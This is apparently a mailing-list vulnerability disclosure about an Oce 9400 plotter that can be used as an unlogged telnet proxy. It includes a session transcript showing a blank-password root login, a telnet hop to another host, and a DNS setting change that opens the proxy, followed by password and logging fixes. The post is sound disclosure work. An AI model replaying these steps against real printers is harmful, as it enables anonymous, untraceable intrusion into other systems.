I apologize if this has be brought up before, but with the recent post concerning the QMS 2060 printers and the length of time I have sat on this (4 months) I figured it should be released. I sent this information to OCE long ago with no response. I am aware of the Intelligent Peripherals bulletin by CIAC. http://www.ciac.org/ciac/bulletins/j-019.shtml I have a few plotters / printers under my audit umbrella and noticed something interesting on an Oce' 9400 plotter. The printer has the ability to be a telnet proxy. Where as a user can hop via telnet to other hosts. If the printer is not setup properly the connections will go unlogged. bunyip% telnet JPP1 Trying 192.168.38.244... Connected to JPP1. Escape character is '^]'. Network Printer Server Version 5.6.3 (192.168.38.244) login: root Password:[Just enter here] Welcome root user WARNING: current and stored values differ. Use 'list diff' command to find the differences. Current values will be lost if unit is reset. 192.168.38.244:root> telnet 192.168.38.110 trying 192.168.38.110 ... Connected to 192.168.38.110 Escape character is '0x18' Red Hat Linux release 5.9 (Starbuck) Kernel 2.2.3-5 on an i586 login: 192.168.38.244:root> list sysinfo name: contact: location: version: 5.6.3 serial number: 13029 compiled: Mar 25 1998 loginfo: sys logport: syslog: 255.255.255.255 email: NetPrint@<unconfigured> dns server: 192.168.38.110 module: novell, appletalk, netbios checksum: 1E54 All that is needed is a valid DNS server setup in the plotter configuration. 192.168.38.244:root> set sysinfo dns 192.168.38.100 And anyone can use the plotter as an anonymous telnet proxy. Fix Enable passwords for the accounts on the plotter: syntax: set user add <NAME> set user del <NAME> set user passwd <NAME> [<PASSWORD>] set user type <NAME> root|guest set user from default|stored Enable logging: syntax: set logpath <LOGPATH> name <NEW_NAME> set logpath <LOGPATH> type [[-]job] [[-]user] [[-]pgcnt] [[-]cksum] [[-]printer] [[-]ioport] set logpath <LOGPATH> port <TCP-PORT>|email|syslog set logpath from default|stored P.S. This plotter has ping functionality also. No, I have not tried DoS attacks =) syntax: ping [-s] <IPNAME> [<DATASZ> [<NUMPKTS>]]